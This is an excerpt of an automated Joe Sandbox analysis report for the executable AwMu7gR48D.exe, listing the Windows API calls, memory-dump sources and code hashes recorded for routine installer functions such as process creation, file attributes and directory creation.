                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue
                                                                              • String ID: : Completed
                                                                              • API String ID: 3356406503-2954849223
                                                                              • Opcode ID: 3949dd6c93d052dc7270a5251cfef74d8147a6dfb4195bf0c528e32bcb56f74b
                                                                              • Instruction ID: 33be00f72f12327029ad1653fb2bc99e6b823e337a66ede3503504709cbc349d
                                                                              • Opcode Fuzzy Hash: 3949dd6c93d052dc7270a5251cfef74d8147a6dfb4195bf0c528e32bcb56f74b
                                                                              • Instruction Fuzzy Hash: 31015A72504209AEDF228F61CC09FEB3BA8EF55364F008426FE59A2190D778DA54CFA4
                                                                              APIs
                                                                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004055F7
                                                                              • CloseHandle.KERNEL32(?), ref: 00405604
                                                                              Strings
                                                                              • Error launching installer, xrefs: 004055E1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateHandleProcess
                                                                              • String ID: Error launching installer
                                                                              • API String ID: 3712363035-66219284
                                                                              • Opcode ID: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
                                                                              • Instruction ID: f1ce92c91028e46d95f0eda4fe37c0312dcd0371124bcb88e834d1219d8c4f53
                                                                              • Opcode Fuzzy Hash: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
                                                                              • Instruction Fuzzy Hash: 5BE04FF0A00209BFEB009B60EC05F7B7ABCEB00748F404961BD11F31A0E374A9108A79
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 55cd16da708e23aec6a838b73e901bfe03af6665630861bb5c569519520454bd
                                                                              • Instruction ID: c387c58543e41996c7b199f294dd4e3f2d8ae9e2c90db5b1f56269fb3149e58b
                                                                              • Opcode Fuzzy Hash: 55cd16da708e23aec6a838b73e901bfe03af6665630861bb5c569519520454bd
                                                                              • Instruction Fuzzy Hash: 32A14271E00229CBDF28CFA8C8587ADBBB1FF44305F15806AD856BB281D7785A96DF44
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 320ecdc90cbab0b9bf19e530f323a115307d17d478260d9a41c0a63678b5b88a
                                                                              • Instruction ID: c0a55b7bb8cda596ca91e270a613f9aea3b485865d608933a43e484043593474
                                                                              • Opcode Fuzzy Hash: 320ecdc90cbab0b9bf19e530f323a115307d17d478260d9a41c0a63678b5b88a
                                                                              • Instruction Fuzzy Hash: 45913374D00229CBDF28CF98C8587ADBBB1FF44305F15812AD816BB291C7785996DF48
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4092221e86ab5222082a79c128cb789b468c9c6112b2c9e1203115320ceab273
                                                                              • Instruction ID: 33bdc002aa07cba8751fe1bb89261eb1bbd9089b315c8d097eab8488b12144ec
                                                                              • Opcode Fuzzy Hash: 4092221e86ab5222082a79c128cb789b468c9c6112b2c9e1203115320ceab273
                                                                              • Instruction Fuzzy Hash: 19814575D04228DFDF24CFA8C8847ADBBB1FB44305F25816AD816BB291C7389A96DF44
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a9b85a074dbd17559818524a47274955f7f908a271802c30195d609476ec7543
                                                                              • Instruction ID: 368e1e7272001cfb6f2dd5e39cf93d71f7d9f1f25059b380f60c2813f7b9aa4b
                                                                              • Opcode Fuzzy Hash: a9b85a074dbd17559818524a47274955f7f908a271802c30195d609476ec7543
                                                                              • Instruction Fuzzy Hash: 00818735D04228DBDF28CFA8C8447ADBBB1FB44305F21816AD856BB2C1D7785A96DF48
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 05e0991df275fe04e69e24ab9d87d2bf1db0f1f681a575424d6ee50318c34d6b
                                                                              • Instruction ID: 563e9c7bfc12ab1e5735381274df4cd9413df1207b4ba467b436c4b8586dcceb
                                                                              • Opcode Fuzzy Hash: 05e0991df275fe04e69e24ab9d87d2bf1db0f1f681a575424d6ee50318c34d6b
                                                                              • Instruction Fuzzy Hash: C9713471D04228DFDF28CFA8C884BADBBB1FB44305F15806AD816B7291D7389996DF58
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 51e8a78d7989ecdb0a9d35429efa0a8906fb135c8ca24dc2c1ed10a6651990fe
                                                                              • Instruction ID: 7154c5ac750784d404653f653373d782701dde13a8780768b6f209b569f9d9aa
                                                                              • Opcode Fuzzy Hash: 51e8a78d7989ecdb0a9d35429efa0a8906fb135c8ca24dc2c1ed10a6651990fe
                                                                              • Instruction Fuzzy Hash: 61714471D04228DBDF28CFA8C894BADBBB1FB44305F15806AD816BB291C7385996DF48
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c27dc6e5a0a86cb3c75e96e92f3c4bfdd7bca547c1c201786b56e13d92a68def
                                                                              • Instruction ID: 6d4e519aaefd354d35621c14bbf49efb9ee6a20a3da98f77445617ba41e869e3
                                                                              • Opcode Fuzzy Hash: c27dc6e5a0a86cb3c75e96e92f3c4bfdd7bca547c1c201786b56e13d92a68def
                                                                              • Instruction Fuzzy Hash: 64715771D04229DBEF28CF98C844BADBBB1FF44305F15806AD816B7291C7389996DF48
                                                                              APIs
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00401BCC
                                                                              • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401BDE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocFree
                                                                              • String ID: 307
                                                                              • API String ID: 3394109436-3197571367
                                                                              • Opcode ID: d334b10cf0e6116476e410e6ad20a9aceabb79b78abcd267d4b567475e094b3c
                                                                              • Instruction ID: 8e70e66a58bbe0bbdc708fb34704032e6401d8afa79375c0cb6f9cb36bca9441
                                                                              • Opcode Fuzzy Hash: d334b10cf0e6116476e410e6ad20a9aceabb79b78abcd267d4b567475e094b3c
                                                                              • Instruction Fuzzy Hash: 9C2193B6704312ABCB10EBA4DD89A5A77B9DB44314720443BF606B32D1D77CE8118B5E
                                                                              APIs
                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 3be8b2c82b9d5296ba031bde5fc3ac6967fc1ef6e00b1cb2986e69e81292ed92
                                                                              • Instruction ID: 2eeecbca978bd34a3a2c87f0a48c5f542c226d41099ae67583a71d3d142e8862
                                                                              • Opcode Fuzzy Hash: 3be8b2c82b9d5296ba031bde5fc3ac6967fc1ef6e00b1cb2986e69e81292ed92
                                                                              • Instruction Fuzzy Hash: 80012831724210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(?,?,?,0040322E,0000000A), ref: 004062D9
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004062F4
                                                                                • Part of subcall function 00406259: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406270
                                                                                • Part of subcall function 00406259: wsprintfA.USER32 ref: 004062A9
                                                                                • Part of subcall function 00406259: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                              • String ID:
                                                                              • API String ID: 2547128583-0
                                                                              • Opcode ID: a3d13027c8eccd2d0cc6aa0f1dea92ffe2580633c4132c5b9e113a6e73deba4a
                                                                              • Instruction ID: 3d2559cad02f3f2c9522d4b64a0f21e72dff4147d54ae6b068db265a7fe850db
                                                                              • Opcode Fuzzy Hash: a3d13027c8eccd2d0cc6aa0f1dea92ffe2580633c4132c5b9e113a6e73deba4a
                                                                              • Instruction Fuzzy Hash: 10E08C32A08111ABD3217B749D0493B77A89F8470030208BEF90AF2190D738EC61A6AD
                                                                              APIs
                                                                              • GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\AwMu7gR48D.exe,80000000,00000003), ref: 00405ACC
                                                                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AEE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesCreate
                                                                              • String ID:
                                                                              • API String ID: 415043291-0
                                                                              • Opcode ID: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
                                                                              • Instruction ID: 2f873e3f3c43f12a3908621a4267836d753c9203ad123c8b10a06e7f93ada197
                                                                              • Opcode Fuzzy Hash: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
                                                                              • Instruction Fuzzy Hash: C7D09E31658201EFEF098F20DD16F2EBBA2EB84B00F10962CB642944E0D6715815AB16
                                                                              APIs
                                                                              • GetFileAttributesA.KERNELBASE(?,?,004056BB,?,?,00000000,0040589E,?,?,?,?), ref: 00405AA8
                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405ABC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 7ab00c422df54d36d0d1c47ad5130eeae7fd73d224c9059dc67d6d60f2aac68c
                                                                              • Instruction ID: bcda01e7c8f131fa4aeedd5c016714751ae51b75e9bd1bf7c5bedf72497e11f2
                                                                              • Opcode Fuzzy Hash: 7ab00c422df54d36d0d1c47ad5130eeae7fd73d224c9059dc67d6d60f2aac68c
                                                                              • Instruction Fuzzy Hash: 23D01276A18125AFC3102728ED0C89BBF65DB54371705CB31FCB9A26F0E7304C529AA5
                                                                              APIs
                                                                              • CreateDirectoryA.KERNELBASE(?,00000000,004031AE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 0040559F
                                                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004055AD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1375471231-0
                                                                              • Opcode ID: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
                                                                              • Instruction ID: 609e72d12c2576d63fea847a2789036c648b4b30b0b2df40a2479a0d359059ce
                                                                              • Opcode Fuzzy Hash: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
                                                                              • Instruction Fuzzy Hash: 80C04C70609502EAEA515B319E08B177A66AB50741F1189356106F41F4D6349551D93F
                                                                              APIs
                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403170,00000000,00000000,00402FCD,000000FF,00000004,00000000,00000000,00000000), ref: 00405B54
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
                                                                              • Instruction ID: 4179e0c76098f610a2fd9102cb0c328980851925f4446f1dd22fc868df860445
                                                                              • Opcode Fuzzy Hash: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
                                                                              • Instruction Fuzzy Hash: 8CE0EC32A1425EABDF109E659C00EEB7BBCEB05760F048432FD15E3150D235F921DBA9
                                                                              APIs
